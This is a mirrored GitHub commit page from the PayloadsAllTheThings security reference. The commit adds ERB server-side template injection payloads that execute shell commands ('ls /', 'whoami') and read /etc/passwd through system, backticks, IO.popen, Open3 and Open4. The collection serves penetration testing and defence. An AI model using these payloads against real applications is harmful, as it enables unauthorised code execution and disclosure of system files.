mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Merge pull request #210 from meizjm3i/meizj-PayloadsAllTheThings
Update ERB SSTI tips
This commit is contained in:
commit
137333cef6
@ -95,7 +95,13 @@ Execute code using SSTI for ERB engine.
|
||||
|
||||
```ruby
|
||||
<%= system('cat /etc/passwd') %>
|
||||
<%= `ls /` %>
|
||||
<%= IO.popen('ls /').readlines() %>
|
||||
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
|
||||
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
|
||||
```
|
||||
|
||||
|
||||
Execute code using SSTI for Slim engine.
|
||||
|
||||
```powershell
|
||||
|
Loading…
Reference in New Issue
Block a user